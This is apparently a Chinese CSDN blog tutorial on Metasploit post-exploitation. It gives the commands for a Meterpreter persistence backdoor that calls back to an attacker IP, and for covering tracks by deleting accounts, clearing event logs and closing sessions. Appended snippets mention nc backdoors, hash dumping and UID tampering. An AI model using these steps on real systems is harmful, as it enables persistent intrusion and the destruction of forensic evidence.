【kali-权限提升】(4.2.7)社会工程学工具包:权限维持创建后门、清除痕迹

最新推荐文章于 2024-08-02 11:53:15 发布
最新推荐文章于 2024-08-02 11:53:15 发布
阅读量904 收藏 9
点赞数 3
分类专栏: 0X03【kali渗透】 文章标签: 安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53079406/article/details/126217360
版权

目录

一、权限维持创建后门

1.1、概述:

1.2、过程:

二、清除痕迹

2.1、第一步:日志

2.2、第二步:清理额外信息

2.3、第三步:MSF清理

一、权限维持创建后门

1.1、概述:

获取目标系统的访问权限后,如果目标用户破坏了该连接(重启),所以需要在此之前,创建一个后门来恢复与目标主机的连接,而无需再进入目标系统。,此时使用后门将允许自动重新与目标系统建立连接。

1.2、过程:

激活Meterpreter会话

sessions -i 2

查看帮助命令

run persistence -h

结合不同的选项,创建一个持久后门

run persistence -U -A -i 10 - 8090 -r 192.168.190.149

输出的信息显示创建后门过程,在目标系统中创建了一个持久脚本(保存在C:\DOCUME~l\Test\LOCALS~I\Temp\lzXBdJvcpnD.vbs)并篡改注册表,该脚本会自动在目标主机上运行, 并将会建立第二个Meterpreter会话。

验证后门

关闭攻击会话,并重启目标机

监听目标,重启后能上线获得攻击会话

就算远控木马文件payload.exe被清除,但后门还在

如果后门脚本、注册表注册项清除,将无法再控制

二、清除痕迹

(如果提示:stdapi_sys_eventlog_clear:操作失败:访问被拒绝)

(操作前都是需要提权的,如getsystem提取,或者查看补丁信息后提权)

2.1、第一步:日志

为了不暴露攻击者的痕迹行为,需要清除系统事件

打开 Windows 事件查看器(可以看到日志信息)

直接在控制面板搜

 

2.2、第二步:清理额外信息

删除添加的账号
net user 添加的用户名 /del


退出目标服务器的shell
exit  或者  logoff


删除日志
clearev

2.3、第三步:MSF清理

退出meterpreter shell
exit


查看所有的MSF连接
sessions


关闭所有的MSF链接(或指定的)
sessions -K

黑色地带(崛起)
关注
专栏目录
Kali渗透测试之提权1——本地提权
浅浅的博客
05-05 1725
本地提权 定义:我们已经登录到目标系统的计算机上,拿到目标系统的shell,在这个shell基础之上,进行提权。 现在的操作系统都是多用户操作系统,一个操作系统可以设置多个用户账号,这些账号可以是用户账号,也可以是为某个应用程序专门设置的应用程序账号。这样做的目的是进行不同账号之间权限的隔离,因为所有的事情都由一个账号去做的话,必须赋予该账号最大的权限,...
kali-权限提升】(4.2.4)社会工程学工具包:远控木马使用、设置、利用
08-08 1428
社会工程学工具包】远控木马全过程
运用Kali Linux对靶机进行简单提权(计划任务、sudo滥用和Python建立反弹shell连接)
最新发布
Xinghaoyang666的博客
08-02 1058
本篇文章仅具有教学意义,测试环境为内网虚拟机(Kali Linux)对靶机(DarkHole2)渗透,如有不法分子使用此文章的内容命令对公网进行渗透,与本文章作者无关,如有发现,请及时举报。
kali linux权限维持,权限维持篇-NC后门
weixin_39829236的博客
04-29 459
今天一直在总结msf的命令,看到TRY大佬的NC后门,感觉不错,特来复现一下。前提拿到一个shell,并且还需要提权,以高权限进行后门利用,否则会失败。因为整个过程,需要操控注册表来完成。低权限的失败案例:后门安置上传NCKali中带有Windows下的NC。upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32解释一下为什么...
权限提升+权限维持+痕迹清理
weixin_52526216的博客
05-31 937
windows提权 IIS-USER—>administrator 本地提权 AT提权——win7 at 17:27 /interactive cmd.exe SC提权——win7和win2008、win2003 #sc 创建 服务名称 程序路径=空格"执行命令" 类型=空格own sc Create syscmd binPath= "cmd /K start" type= own type= interact #sc 启动 服务名称 sc start syscmd PSTools—
kali监听win2008;反弹shell;msf生成木马;留后门权限维持
xiaochenhang的博客
08-30 1299
2、在win2008里面使用这条命令,将创建⼀个abc计划任务,每⼀分钟 执⾏⼀次abcd.exe;1、填写自己kali地址和要使用的端口号;生成abcd.exe木马;4、kali使用msfconsole工具进行渗透。注意abcd.exe路径;在计算机管理里面可以看见。...
Kali Linux 中的社会工程学工具包
2301_78324752的博客
04-21 839
社会工程学是一种通过对受害者心理弱点、本能反应、好奇心、信任、贪婪等心理陷阱进行诸如欺骗等危害手段取得自身利益的手法,是通过研究受害者心理,并以此诱使受害者做出配合,从而达到自身目的的方法。近年来,利用社会工程学谋取利益的人越来越多,这给网络安全带来了极大的隐患。
Kali-linux使用社会工程学工具包(SET)
2301_77162959的博客
05-19 1052
社会工程学工具包(SET)是一个开源的、Python驱动的社会工程学渗透测试工具。这套工具包由David Kenned设计,而且已经成为业界部署实施社会工程学攻击的标准。SET利用人们的好奇心、信任、贪婪及一些愚蠢的错误,攻击人们自身存在的弱点。使用SET可以传递攻击载荷到目标系统,收集目标系统数据,创建持久后门,进行中间人攻击等。本节将介绍社会工程学工具包的使用。
kali-linux工具包官方使用教程
03-06
kali-linux工具包官方使用教程,kali各个工具的使用教程
Kali-Linux-Tools-Interface:开发图形化Web界面以促进安全信息工具的使用
01-31
该项目使用Kali Linux工具作为参考,因为它是具有最大数量的本机工具包的发行版。 先决条件 基于Debian的发行版(最好是 ) 信息安全工具安装 Apache / Nginx服务正在运行 SSH服务正在运行 装在盒子里(如果要使用...
kali Linux 社会工程学工具
qq_39308796的博客
06-15 910
kali Linux 社会工程学工具使用
kali linux权限维持,msfconsole权限维持
weixin_42297742的博客
04-29 452
获取管理员hash获得shell后,执行命令getsystem提高权限为管理员权限,接着执行命令run post/windows/gather/hashdump获取hashAdministrator:500:aad3b435b51404eeaad3b435b51404ee:bd75068c6729aacd2fe3497b43bb664e:::权限维持执行命令use exploit/windows/...
Kali Linux渗透测试—提权(一)——本地提权
weixin_45116657的博客
08-18 2021
本地提权: 目前系统都是多用户操作系统,可以登录多个账户,实现权限的隔离。针对不同的应用——对应不同的账户——不同的账户在对应不同的权限; 本地提权一般用于已经获取到了本地低权限的账号,希望获取更高的权限,实现对目标的进一步控制; 简单而言,本地提权漏洞就是说一个本来非常低权限、受限制的用户,可以提升到系统至高无上的权限权限控制是WINDOWS、Linux等系统安全的基石,也是一切安全软件的基...
kali提升root权限
cuisidong1997的博客
11-27 1650
4、按 i 进入编辑模式,将想要提升权限的用户名后面的1000:1000改为0:0;5、按esc退出后,按 wq 或 shift+zz保存退出;6、reboot重启。
【实战系列 2】Yapi接口管理平台Getshell-Linux后门权限维持痕迹清除
02-16 1096
授权渗透测试实战,通过SSH软链接进行Linux后门权限维持,实践如何隐藏历史操作命令、隐藏文件/文件夹、修改文件时间戳以及隐藏权限等方法清除入侵痕迹,做到事后无残留。
kali】29 提权—— 利用漏洞提权
(∪.∪ )...zzz的博客
11-27 8027
这里写自定义目录标题一、使用 Ms011-080 获取 WinXP 的 SYSTEM 权限1. Ms011-080 对应补丁 Kb25927992. kali集成了exploit3. 查看.py4. 生成.exe5. 运行exe提权成功二、Win7 使用 Ms14-068 获取 域控制器的权限1.win2003搭建域控制器2. 修改win2003域控制器的用户权限三、利用 CVE-2012-0056 提升 linux 权限 一、使用 Ms011-080 获取 WinXP 的 SYSTEM 权限 1. Ms0
Kali Linux渗透测试之提权(一)——本地提权
qq_29864185的博客
07-08 3105
目录 本地提权 Windows系统用户权限划分 Linux系统用户权限划分 1. Windows系统下进行提权 (1)查看当前用户的信息;(前提:进行提权的用户是administrator权限) (2)提权——Psexec (3)提权——At (4)使所有cmd命令行窗口都是以system权限打开 (6)注入进程提权,隐蔽痕迹——Pinjecter 2. Linux系统下进行提权 本地提权 目前系统都是多用户操作系统,可以登录多个账户,实现权限的隔离,针对不同的应用,对应不同的账户
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

黑色地带(崛起)

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值